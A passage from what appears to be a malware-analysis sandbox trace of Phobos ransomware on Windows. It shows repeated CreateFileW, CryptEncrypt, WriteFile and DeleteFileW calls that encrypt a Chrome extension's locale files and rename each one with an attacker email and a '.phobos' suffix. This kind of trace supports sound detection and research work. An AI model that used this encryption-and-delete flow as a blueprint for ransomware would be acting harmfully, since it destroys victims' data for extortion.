"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json")) returned 0x2020 [0153.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.198] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.198] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.198] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.198] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.198] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd8, lpOverlapped=0x0) returned 1 [0153.199] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0153.199] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0153.200] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.200] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.200] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.200] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.200] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.201] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.201] CloseHandle (hObject=0x130) returned 1 [0153.201] CloseHandle (hObject=0x138) returned 1 [0153.201] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json")) returned 1 [0153.202] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.203] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=215) returned 1 [0153.203] CloseHandle (hObject=0x138) returned 1 [0153.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json")) returned 0x2020 [0153.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.203] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.203] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.204] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.204] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.204] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd7, lpOverlapped=0x0) returned 1 [0153.205] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0153.205] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0153.207] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.207] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.207] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.207] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.207] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.207] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.207] CloseHandle (hObject=0x138) returned 1 [0153.207] CloseHandle (hObject=0x130) returned 1 [0153.208] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json")) returned 1 [0153.208] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.209] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=245) returned 1 [0153.209] CloseHandle (hObject=0x130) returned 1 [0153.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json")) returned 0x2020 [0153.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.209] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.209] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.210] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.210] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.210] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf5, lpOverlapped=0x0) returned 1 [0153.213] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0153.213] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0153.214] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.214] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.214] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.214] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.214] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.215] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.215] CloseHandle (hObject=0x130) returned 1 [0153.215] CloseHandle (hObject=0x138) returned 1 [0153.215] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json")) returned 1 [0153.217] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.217] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=224) returned 1 [0153.217] CloseHandle (hObject=0x138) returned 1 [0153.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json")) returned 0x2020 [0153.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.218] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.218] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.218] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.218] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe0, lpOverlapped=0x0) returned 1 [0153.219] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0153.219] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0153.220] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.220] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.220] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.220] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.221] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.221] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.221] CloseHandle (hObject=0x138) returned 1 [0153.221] CloseHandle (hObject=0x130) returned 1 [0153.221] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json")) returned 1 [0153.222] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.223] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=235) returned 1 [0153.223] CloseHandle (hObject=0x130) returned 1 [0153.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json")) returned 0x2020 [0153.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.223] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.223] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 